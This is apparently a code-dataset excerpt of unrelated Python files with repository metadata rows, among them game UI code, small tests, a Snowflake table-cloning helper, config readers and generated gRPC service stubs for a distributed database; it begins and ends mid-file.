self.play_button.collide_point(*self.engine.screen_manager.pixel_to_screen(x, y))
def on_mouse_down(self, button, x, y):
sx, sy = self.engine.screen_manager.pixel_to_screen(x, y)
if self.play_button.collide_point(sx, sy):
self.play_button.on_click(sx, sy)
self.engine.screen_manager.transition('game')
def on_mouse_up(self, button, x, y):
sx, sy = self.engine.screen_manager.pixel_to_screen(x, y)
if self.play_button.collide_point(sx, sy):
self.play_button.on_release(sx, sy)
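# Subclassing sketch (mirrors the pattern above; 'PauseScreen' is a
# hypothetical screen name, not part of this game):
# class PauseScreen(Screen):
#     def on_key_down(self, key):
#         if key == GLFW_KEY_ESCAPE:
#             self.engine.screen_manager.transition('game')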
| 31.728395 | 89 | 0.6107 | 718 | 5,140 | 4.118384 | 0.133705 | 0.145418 | 0.108894 | 0.163341 | 0.825161 | 0.773081 | 0.729117 | 0.625634 | 0.557998 | 0.522489 | 0 | 0.009212 | 0.281907 | 5,140 | 161 | 90 | 31.925466 | 0.791926 | 0 | 0 | 0.713115 | 0 | 0 | 0.022568 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.237705 | false | 0.098361 | 0.016393 | 0 | 0.278689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
7a8f6fddd0e4b93694af7a34857430717f10bda6 | 169 | py | Python | integration/test_app.py | RUOK90/MLOps_practice | 1c834165239429294debbcd0712f3df4087f9171 | [
"MIT"
] | null | null | null | integration/test_app.py | RUOK90/MLOps_practice | 1c834165239429294debbcd0712f3df4087f9171 | [
"MIT"
] | null | null | null | integration/test_app.py | RUOK90/MLOps_practice | 1c834165239429294debbcd0712f3df4087f9171 | [
"MIT"
] | null | null | null | # TODO(everyone): check that the web server's healthz endpoint returns response code 200
import requests
def test_healthz():
assert requests.get('http://127.0.0.1:5000/healthz').status_code == 200
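# Run sketch: this integration test assumes the service is already listening
# on 127.0.0.1:5000, e.g.
#   pytest integration/test_app.py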
| 18.777778 | 75 | 0.721893 | 26 | 169 | 4.615385 | 0.807692 | 0.116667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110345 | 0.142012 | 169 | 8 | 76 | 21.125 | 0.717241 | 0.295858 | 0 | 0 | 0 | 0 | 0.247863 | 0 | 0 | 0 | 0 | 0.125 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7aa94dd39248a7f28059f396e9f4bef4d122473e | 676 | py | Python | tests/test_tools.py | BenAAndrew/Python-Image-Fetcher | 569e920c587df5ca0a8b8566446bb6f00cade56e | [
"MIT"
] | 3 | 2019-10-12T15:44:50.000Z | 2021-08-13T00:18:03.000Z | tests/test_tools.py | BenAAndrew/Python-Image-Fetcher | 569e920c587df5ca0a8b8566446bb6f00cade56e | [
"MIT"
] | 2 | 2021-06-02T00:29:05.000Z | 2021-08-14T19:39:21.000Z | tests/test_tools.py | BenAAndrew/Python-Image-Fetcher | 569e920c587df5ca0a8b8566446bb6f00cade56e | [
"MIT"
] | 1 | 2022-01-23T07:42:09.000Z | 2022-01-23T07:42:09.000Z | from image_fetcher.tools import escape_image_name
class TestTools:
def test_escape_image_name_http(self):
url = "http://www.fakewebsite.com/sample.jpg"
result = escape_image_name(url)
assert result == "wwwfakewebsitecomsample.jpg"
def test_escape_image_name_https(self):
url = "https://www.fakewebsite.com/sample.jpg"
result = escape_image_name(url)
assert result == "wwwfakewebsitecomsample.jpg"
def test_escape_image_name_non_alphanumeric_characters(self):
url = "https://www.fakewebsite!.com/sample$_.jpg"
result = escape_image_name(url)
assert result == "wwwfakewebsitecomsample.jpg"
| 35.578947 | 65 | 0.70858 | 81 | 676 | 5.617284 | 0.320988 | 0.169231 | 0.230769 | 0.118681 | 0.778022 | 0.72967 | 0.72967 | 0.72967 | 0.72967 | 0.72967 | 0 | 0 | 0.192308 | 676 | 18 | 66 | 37.555556 | 0.833333 | 0 | 0 | 0.428571 | 0 | 0 | 0.29142 | 0.119822 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f4450134a17c1cb60c6f383f3c180aaa49af55e | 1,044 | py | Python | torchswe/utils/data/__init__.py | piyueh/TorchSWE | 3faa18d83e24ae0b74966777516458eb1aa6f480 | [
"BSD-3-Clause"
] | 2 | 2022-03-07T09:22:27.000Z | 2022-03-24T02:30:30.000Z | torchswe/utils/data/__init__.py | reyhashemi/TorchSWE | 3faa18d83e24ae0b74966777516458eb1aa6f480 | [
"BSD-3-Clause"
] | null | null | null | torchswe/utils/data/__init__.py | reyhashemi/TorchSWE | 3faa18d83e24ae0b74966777516458eb1aa6f480 | [
"BSD-3-Clause"
] | 2 | 2021-05-18T10:56:56.000Z | 2022-01-11T09:12:09.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020-2021 Pi-Yueh Chuang <pychuang@gwu.edu>
#
# Distributed under terms of the BSD 3-Clause license.
"""Data structs of TorchSWE.
"""
from torchswe.utils.data.grid import Gridline
from torchswe.utils.data.grid import Timeline
from torchswe.utils.data.grid import Domain
from torchswe.utils.data.grid import get_gridline_x
from torchswe.utils.data.grid import get_gridline_y
from torchswe.utils.data.grid import get_timeline
from torchswe.utils.data.grid import get_domain
from torchswe.utils.data.topography import Topography
from torchswe.utils.data.topography import get_topography
from torchswe.utils.data.states import States
from torchswe.utils.data.states import get_empty_states
from torchswe.utils.data.states import get_initial_states
from torchswe.utils.data.source import PointSource
from torchswe.utils.data.source import FrictionModel
from torchswe.utils.data.source import get_pointsource
from torchswe.utils.data.source import get_frictionmodel
| 34.8 | 57 | 0.820881 | 159 | 1,044 | 5.314465 | 0.301887 | 0.227219 | 0.321893 | 0.397633 | 0.769231 | 0.72426 | 0.485207 | 0.198817 | 0 | 0 | 0 | 0.011665 | 0.096743 | 1,044 | 29 | 58 | 36 | 0.883351 | 0.184866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8f65151dfe3cd61bb59c4b381e7430155affddf3 | 6,253 | py | Python | cloudy_warehouses/copy_snowflake.py | hashmapinc/cloudy_warhouses | a691529e0cc355a9d8b04acbd4ea42c24c2933fe | [
"Apache-2.0"
] | 3 | 2021-02-02T15:09:35.000Z | 2021-04-29T17:48:10.000Z | cloudy_warehouses/copy_snowflake.py | hashmapinc/cloudy_warhouses | a691529e0cc355a9d8b04acbd4ea42c24c2933fe | [
"Apache-2.0"
] | null | null | null | cloudy_warehouses/copy_snowflake.py | hashmapinc/cloudy_warhouses | a691529e0cc355a9d8b04acbd4ea42c24c2933fe | [
"Apache-2.0"
] | null | null | null | from cloudy_warehouses.snowflake_objects.snowflake_object import SnowflakeObject
# Copier Object
class SnowflakeCopier(SnowflakeObject):
"""Class that holds the clone and clone_empty methods."""
    # SQL statement executed by the cursor object
    sql_statement: str = ""
def clone(self, new_table: str, source_table: str, source_schema: str = None, source_database: str = None,
database: str = None, schema: str = None, username: str = None, password: str = None,
account: str = None, role: str = None, warehouse: str = None):
"""method that creates a copy of a Snowflake table."""
try:
# initialize Snowflake connection and configure credentials
self.initialize_snowflake(
database=database,
schema=schema,
username=username,
password=password,
account=account,
warehouse=warehouse,
role=role
)
# build sql statement to be executed by the cursor object
if source_database and source_schema:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} CLONE " \
f"{source_database}.{source_schema}.{source_table}"
elif source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} CLONE " \
f"{source_schema}.{source_table}"
elif not source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} CLONE " \
f"{source_table}"
else:
self.log_message = "Error: please call this method with the proper values. Example: If you call this " \
"method with the 'source_database' parameter, " \
"you must include a 'source_schema' parameter as well"
self._logger.error(self.log_message)
return False
# execute sql statement
self.cursor = self.connection.cursor()
# use warehouse if not None
if self.sf_credentials['warehouse']:
self.cursor.execute(f"use warehouse {self.sf_credentials['warehouse']};")
self.cursor.execute(self.sql_statement)
# catch and log error
except Exception as e:
self.log_message = e
self._logger.error(self.log_message)
return False
finally:
# close connection and cursor
if self.connection:
self.connection.close()
if self.cursor:
self.cursor.close()
# log successful clone
self.log_message = f"Successfully cloned {source_table} into {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table}"
self._logger.info(self.log_message)
return True
def clone_empty(self, new_table: str, source_table: str, database: str = None, schema: str = None,
source_database: str = None, source_schema: str = None, username: str = None,
password: str = None, account: str = None, role: str = None, warehouse: str = None):
"""method that creates an empty copy of a Snowflake table."""
try:
# initialize Snowflake connection and configure credentials
self.initialize_snowflake(
database=database,
schema=schema,
username=username,
password=password,
account=account,
role=role,
warehouse=warehouse
)
# build sql statement to be executed by the cursor object
if source_database and source_schema:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} LIKE " \
f"{source_database}.{source_schema}.{source_table}"
elif source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} LIKE " \
f"{source_schema}.{source_table}"
elif not source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} LIKE " \
f"{source_table}"
else:
self.log_message = "Error: please call this method with viable values. Example: If you call this " \
"method with the 'source_database' parameter, " \
"you must include a 'source_schema' parameter as well"
self._logger.error(self.log_message)
return False
# execute sql statement
self.cursor = self.connection.cursor()
# use warehouse if not None
if self.sf_credentials['warehouse']:
self.cursor.execute(f"use warehouse {self.sf_credentials['warehouse']};")
self.cursor.execute(self.sql_statement)
# catch and log error
except Exception as e:
self.log_message = e
self._logger.error(self.log_message)
return False
finally:
# close connection and cursor
if self.connection:
self.connection.close()
if self.cursor:
self.cursor.close()
# log successful clone
self.log_message = f"Successfully cloned an empty version of {source_table} into " \
f"{self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table}"
self._logger.info(self.log_message)
return True
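# Usage sketch (connection values are placeholders, not real credentials):
#   copier = SnowflakeCopier()
#   copier.clone(new_table="orders_copy", source_table="orders",
#                database="ANALYTICS", schema="PUBLIC",
#                username="<user>", password="<pass>", account="<account>")
# clone() issues CREATE OR REPLACE TABLE ... CLONE (rows included), while
# clone_empty() issues CREATE OR REPLACE TABLE ... LIKE (structure only);
# both return True on success and False (with a logged message) on failure.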
| 45.311594 | 150 | 0.577483 | 672 | 6,253 | 5.224702 | 0.145833 | 0.034178 | 0.096839 | 0.056964 | 0.89832 | 0.897465 | 0.888921 | 0.853033 | 0.853033 | 0.853033 | 0 | 0 | 0.335519 | 6,253 | 137 | 151 | 45.642336 | 0.845006 | 0.107149 | 0 | 0.782609 | 0 | 0.01087 | 0.279359 | 0.151657 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0.043478 | 0.01087 | 0 | 0.119565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f7fdf55a41e103b5a8a9c3c19ea5c9617156ff0 | 418 | py | Python | crawler_dag/crawler/rojak_pantau/common/config.py | imrenagi/rojak-pantau | d8c28ed98b3b8493d8ef0d1ce60383c036e3ff05 | [
"MIT"
] | 1 | 2020-07-03T18:05:19.000Z | 2020-07-03T18:05:19.000Z | crawler_dag/crawler/rojak_pantau/common/config.py | imrenagi/rojak-pantau | d8c28ed98b3b8493d8ef0d1ce60383c036e3ff05 | [
"MIT"
] | 21 | 2017-10-09T07:15:30.000Z | 2017-10-23T19:06:38.000Z | crawler_dag/crawler/rojak_pantau/common/config.py | imrenagi/rojak-pantau | d8c28ed98b3b8493d8ef0d1ce60383c036e3ff05 | [
"MIT"
] | 4 | 2017-09-19T01:29:58.000Z | 2019-02-21T10:35:36.000Z | # -*- coding: utf-8 -*-
import os
def db_host():
return os.getenv('ROJAK_DB_HOST', 'rojak-crawler-db')
def db_port():
return int(os.getenv('ROJAK_DB_PORT', 3306))
def db_user():
return os.getenv('ROJAK_DB_USER', 'rojak')
def db_pass():
return os.getenv('ROJAK_DB_PASS', 'rojak')
def db_name():
return os.getenv('ROJAK_DB_NAME', 'crawler')
def slack_token():
return os.getenv('ROJAK_SLACK_TOKEN', '')
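# Usage sketch: each getter reads one connection setting from the
# environment, falling back to the defaults above, e.g.
#   conn = MySQLdb.connect(host=db_host(), port=db_port(),
#                          user=db_user(), passwd=db_pass(), db=db_name())
# (MySQLdb here is an illustrative assumption; this module only exposes the
# getters and does not open connections itself.)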
| 19.904762 | 55 | 0.684211 | 67 | 418 | 4 | 0.298507 | 0.179104 | 0.291045 | 0.354478 | 0.313433 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013774 | 0.131579 | 418 | 20 | 56 | 20.9 | 0.724518 | 0.050239 | 0 | 0 | 0 | 0 | 0.291139 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.461538 | true | 0.153846 | 0.076923 | 0.461538 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
712aefbb5d56f171ff91ca5c03090307ae9229a0 | 131 | py | Python | main_app/context_processors.py | Jonak-Adipta-Kalita/JAK-Website | 39c3723e95d99e990a2e23dbb05746def2ac903a | [
"MIT"
] | 1 | 2021-08-31T14:21:16.000Z | 2021-08-31T14:21:16.000Z | main_app/context_processors.py | Jonak-Adipta-Kalita/JAK-Website | 39c3723e95d99e990a2e23dbb05746def2ac903a | [
"MIT"
] | 74 | 2021-11-03T03:19:12.000Z | 2022-03-31T03:23:49.000Z | main_app/context_processors.py | Jonak-Adipta-Kalita/JAK-Website | 39c3723e95d99e990a2e23dbb05746def2ac903a | [
"MIT"
] | null | null | null | import credentials
def RECAPTCHA_CLIENT_KEY_Func(request):
return {"RECAPTCHA_CLIENT_KEY": credentials.RECAPTCHA_CLIENT_KEY}
| 21.833333 | 69 | 0.832061 | 16 | 131 | 6.375 | 0.5625 | 0.441176 | 0.529412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099237 | 131 | 5 | 70 | 26.2 | 0.864407 | 0 | 0 | 0 | 0 | 0 | 0.152672 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
854fc6634523bc8389713e581bd11056c83c5ca0 | 134 | py | Python | nephthys/formatters/__init__.py | OvalMoney/horus | 90d839e9465f5089fa2632dad9f28190db3a829b | [
"MIT"
] | 2 | 2020-07-17T07:43:53.000Z | 2020-12-03T11:14:59.000Z | nephthys/formatters/__init__.py | OvalMoney/horus | 90d839e9465f5089fa2632dad9f28190db3a829b | [
"MIT"
] | 1 | 2020-01-27T15:49:33.000Z | 2020-01-27T15:49:33.000Z | nephthys/formatters/__init__.py | OvalMoney/horus | 90d839e9465f5089fa2632dad9f28190db3a829b | [
"MIT"
] | 2 | 2020-07-17T07:44:04.000Z | 2020-12-01T11:10:00.000Z | from .json import JSONFormatter as json_formatter # noqa: F401
from .pretty import PrettyFormatter as pretty_formatter # noqa: F401
| 44.666667 | 69 | 0.80597 | 18 | 134 | 5.888889 | 0.555556 | 0.245283 | 0.320755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.149254 | 134 | 2 | 70 | 67 | 0.877193 | 0.156716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
859169b76f1c51bf9ee3107d9bbb0e0630b45a73 | 30,538 | py | Python | net/net_pb2_grpc.py | XueQinliang/DDB_RPQL | da8c0047786543381e20e53e1ffe498646b450f7 | [
"MIT"
] | null | null | null | net/net_pb2_grpc.py | XueQinliang/DDB_RPQL | da8c0047786543381e20e53e1ffe498646b450f7 | [
"MIT"
] | null | null | null | net/net_pb2_grpc.py | XueQinliang/DDB_RPQL | da8c0047786543381e20e53e1ffe498646b450f7 | [
"MIT"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from net import net_pb2 as net_dot_net__pb2
class NetServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Test = channel.unary_unary(
'/net.NetService/Test',
request_serializer=net_dot_net__pb2.Data.SerializeToString,
response_deserializer=net_dot_net__pb2.Data1.FromString,
)
self.Createtable = channel.unary_unary(
'/net.NetService/Createtable',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.Status.FromString,
)
self.Droptable = channel.unary_unary(
'/net.NetService/Droptable',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.Status.FromString,
)
self.Loaddata = channel.unary_unary(
'/net.NetService/Loaddata',
request_serializer=net_dot_net__pb2.LoadParams.SerializeToString,
response_deserializer=net_dot_net__pb2.Status.FromString,
)
self.Insertdata = channel.unary_unary(
'/net.NetService/Insertdata',
request_serializer=net_dot_net__pb2.LoadParams.SerializeToString,
response_deserializer=net_dot_net__pb2.DataReturn.FromString,
)
self.Deletedata = channel.unary_unary(
'/net.NetService/Deletedata',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.DataReturn.FromString,
)
self.SimpleSelect = channel.unary_unary(
'/net.NetService/SimpleSelect',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.SimpleSelectReturn.FromString,
)
self.Excute = channel.unary_unary(
'/net.NetService/Excute',
request_serializer=net_dot_net__pb2.SQLTree.SerializeToString,
response_deserializer=net_dot_net__pb2.TableData.FromString,
)
self.jr_grpc_test = channel.unary_unary(
'/net.NetService/jr_grpc_test',
request_serializer=net_dot_net__pb2.para_jr_grpc_test.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_jr_grpc_test.FromString,
)
self.grpc_dfs = channel.unary_unary(
'/net.NetService/grpc_dfs',
request_serializer=net_dot_net__pb2.para_grpc_dfs.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_grpc_dfs.FromString,
)
self.start_jr = channel.unary_unary(
'/net.NetService/start_jr',
request_serializer=net_dot_net__pb2.para_start_jr.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_start_jr.FromString,
)
self.temp_GC = channel.unary_unary(
'/net.NetService/temp_GC',
request_serializer=net_dot_net__pb2.para_temp_GC.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_temp_GC.FromString,
)
self.createdatabase = channel.unary_unary(
'/net.NetService/createdatabase',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.dropdatabase1 = channel.unary_unary(
'/net.NetService/dropdatabase1',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.dropdatabase2 = channel.unary_unary(
'/net.NetService/dropdatabase2',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.dropdatabase3 = channel.unary_unary(
'/net.NetService/dropdatabase3',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.usedbres.FromString,
)
self.usedatabase1 = channel.unary_unary(
'/net.NetService/usedatabase1',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.usedatabase2 = channel.unary_unary(
'/net.NetService/usedatabase2',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.usedatabase3 = channel.unary_unary(
'/net.NetService/usedatabase3',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.usedbres.FromString,
)
self.jr_exit = channel.unary_unary(
'/net.NetService/jr_exit',
request_serializer=net_dot_net__pb2.para_jr_exit.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_jr_exit.FromString,
)
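# Client-side usage sketch (the endpoint address is a placeholder; request
# message fields depend on net.proto and are elided here):
#   channel = grpc.insecure_channel('localhost:50051')
#   stub = NetServiceStub(channel)
#   status = stub.Createtable(net_dot_net__pb2.SQL(...))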
class NetServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def Test(self, request, context):
"""test method
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Createtable(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Droptable(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Loaddata(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Insertdata(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Deletedata(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SimpleSelect(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Excute(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def jr_grpc_test(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def grpc_dfs(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def start_jr(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def temp_GC(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def createdatabase(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def dropdatabase1(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def dropdatabase2(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def dropdatabase3(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def usedatabase1(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def usedatabase2(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def usedatabase3(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def jr_exit(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
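# --- Illustrative sketch, not part of the generated file -------------------
# A concrete implementation subclasses NetServiceServicer and overrides only
# the RPCs it supports; unimplemented methods keep the UNIMPLEMENTED behavior
# defined above. The empty Data1 reply below is a placeholder assumption.
class _ExampleNetService(NetServiceServicer):
    def Test(self, request, context):
        return net_dot_net__pb2.Data1()
# ---------------------------------------------------------------------------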
def add_NetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Test': grpc.unary_unary_rpc_method_handler(
servicer.Test,
request_deserializer=net_dot_net__pb2.Data.FromString,
response_serializer=net_dot_net__pb2.Data1.SerializeToString,
),
'Createtable': grpc.unary_unary_rpc_method_handler(
servicer.Createtable,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.Status.SerializeToString,
),
'Droptable': grpc.unary_unary_rpc_method_handler(
servicer.Droptable,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.Status.SerializeToString,
),
'Loaddata': grpc.unary_unary_rpc_method_handler(
servicer.Loaddata,
request_deserializer=net_dot_net__pb2.LoadParams.FromString,
response_serializer=net_dot_net__pb2.Status.SerializeToString,
),
'Insertdata': grpc.unary_unary_rpc_method_handler(
servicer.Insertdata,
request_deserializer=net_dot_net__pb2.LoadParams.FromString,
response_serializer=net_dot_net__pb2.DataReturn.SerializeToString,
),
'Deletedata': grpc.unary_unary_rpc_method_handler(
servicer.Deletedata,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.DataReturn.SerializeToString,
),
'SimpleSelect': grpc.unary_unary_rpc_method_handler(
servicer.SimpleSelect,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.SimpleSelectReturn.SerializeToString,
),
'Excute': grpc.unary_unary_rpc_method_handler(
servicer.Excute,
request_deserializer=net_dot_net__pb2.SQLTree.FromString,
response_serializer=net_dot_net__pb2.TableData.SerializeToString,
),
'jr_grpc_test': grpc.unary_unary_rpc_method_handler(
servicer.jr_grpc_test,
request_deserializer=net_dot_net__pb2.para_jr_grpc_test.FromString,
response_serializer=net_dot_net__pb2.ret_jr_grpc_test.SerializeToString,
),
'grpc_dfs': grpc.unary_unary_rpc_method_handler(
servicer.grpc_dfs,
request_deserializer=net_dot_net__pb2.para_grpc_dfs.FromString,
response_serializer=net_dot_net__pb2.ret_grpc_dfs.SerializeToString,
),
'start_jr': grpc.unary_unary_rpc_method_handler(
servicer.start_jr,
request_deserializer=net_dot_net__pb2.para_start_jr.FromString,
response_serializer=net_dot_net__pb2.ret_start_jr.SerializeToString,
),
'temp_GC': grpc.unary_unary_rpc_method_handler(
servicer.temp_GC,
request_deserializer=net_dot_net__pb2.para_temp_GC.FromString,
